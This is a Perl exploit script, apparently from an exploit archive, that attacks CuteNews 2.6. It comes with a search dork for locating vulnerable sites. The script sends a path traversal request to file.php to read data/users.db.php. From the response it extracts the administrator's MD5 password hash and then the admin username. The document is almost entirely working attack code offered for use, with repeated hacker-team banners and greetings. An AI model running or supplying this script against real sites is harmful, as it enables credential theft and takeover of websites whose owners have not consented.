cutenews-download.txt

`!/usr/bin/perl   
#Found by Pr0metheuS   
#Coded by Pr0metheuS   
#CuteNews 2.6 ( module file.php )   
#Gr33tz-TeaM   
#Dork : inurl:/cutenews/file.php   
use LWP::UserAgent;   
if(@ARGV!=2){   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";   
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";   
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";   
print "-=-=-= Gr33tz To : -=-=-=-=-\n";   
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "USAGE : perl $0 <SITE> <PATH>\n";   
exit;   
}   
($SITE,$PATH)=@ARGV;   
$ua = new LWP::UserAgent;   
$ua->agent("Mozilla/8.0");   
$ua = LWP::UserAgent->new;   
my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");   
$req->header('Accept' => 'text/html');   
$res = $ua->request($req);   
$con = $res->content;   
if($res->is_success){   
if($con =~ /([0-9a-fA-F]{32})/){   
$hash = $1;   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";   
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";   
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";   
print "-=-=-= Gr33tz To : -=-=-=-=-\n";   
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "_____________________________\n";   
print "[+] Exploit Work!\n";   
print "[+] Admin Pass : ".$hash."\n";   
  
$ua2 = new LWP::UserAgent;   
$ua2->agent("Mozilla/8.0");   
$ua2 = LWP::UserAgent->new;   
my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");   
$req2->header('Accept' => 'text/html');   
$res2 = $ua2->request($req2);   
$con2 = $res2->content;   
if($con2 =~ /\|.\|(.*)\|$hash\|/){   
$user = $1;   
print "[+] Admin Username : ".$user."\n";   
}   
}   
else{   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";   
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";   
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";   
print "-=-=-= Gr33tz To : -=-=-=-=-\n";   
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "_____________________________\n";   
print "[+] Connect failed..\n";   
}   
}   
else{   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";   
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";   
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";   
print "-=-=-= Gr33tz To : -=-=-=-=-\n";   
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";   
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";   
print "_____________________________\n";   
print "[+] Exploit Failed..\n";   
}  
`